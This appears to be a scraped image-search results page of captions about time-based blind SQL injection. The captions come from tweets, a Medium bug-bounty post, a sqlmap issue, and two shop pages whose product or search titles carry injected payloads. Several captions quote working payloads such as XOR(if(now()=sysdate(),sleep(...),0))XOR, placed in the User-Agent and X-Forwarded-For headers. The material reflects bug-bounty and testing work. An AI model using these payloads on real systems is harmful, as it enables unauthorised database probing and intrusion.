![spread love on Twitter: "Time-based SQLi with two payloads injected in the following headers: 1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR" 2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Both payloads were executed and the ... spread love on Twitter: "Time-based SQLi with two payloads injected in the following headers: 1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR" 2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Both payloads were executed and the ...](https://pbs.twimg.com/media/Fc9JwSrWQAEFYms.png)
spread love on Twitter: "Time-based SQLi with two payloads injected in the following headers: 1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR" 2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Both payloads were executed and the ...
![I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection Vulnerability. | by nav1n🍥 | Mar, 2023 | Medium I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection Vulnerability. | by nav1n🍥 | Mar, 2023 | Medium](https://miro.medium.com/v2/resize:fit:1400/1*u76JHqtNdp3NIg6umaFAXA.png)
I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection Vulnerability. | by nav1n🍥 | Mar, 2023 | Medium
![HiViLux | HiViLux HDMI OFC-cable V1,4a metal - 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z | now online order HiViLux | HiViLux HDMI OFC-cable V1,4a metal - 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z | now online order](https://www.hivilux.de/out/pictures/generated/product/1/540_340_90/hdmi_b_2.jpg)
HiViLux | HiViLux HDMI OFC-cable V1,4a metal - 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z | now online order
![Jawad ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR Jawad ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR](https://pbs.twimg.com/media/EwTKDtIUcAA67nC.png)
Jawad ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR
![NS 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks NS 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks](https://pbs.twimg.com/media/Fe0dxb4WIA4cYdw.png)
NS 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks
Test Payload: 'XOR(if(now()=sysdate(),sleep(10),0))OR' · Issue #4091 · sqlmapproject/sqlmap · GitHub
![Aimagin: Search results for: '<a href="0"XOR(if(now()=sysdate(),sleep(15),0 ))XOR"Z">_2_</a>' AND 2*3*8=6*8 AND 'sfTj'='sfTj' Aimagin: Search results for: '<a href="0"XOR(if(now()=sysdate(),sleep(15),0 ))XOR"Z">_2_</a>' AND 2*3*8=6*8 AND 'sfTj'='sfTj'](https://www.aimagin.com/media/catalog/product/cache/7f3f8f7f8eb39fc3184391861a60b6d0/w/a/waijung_2_for_zynq-7000.png)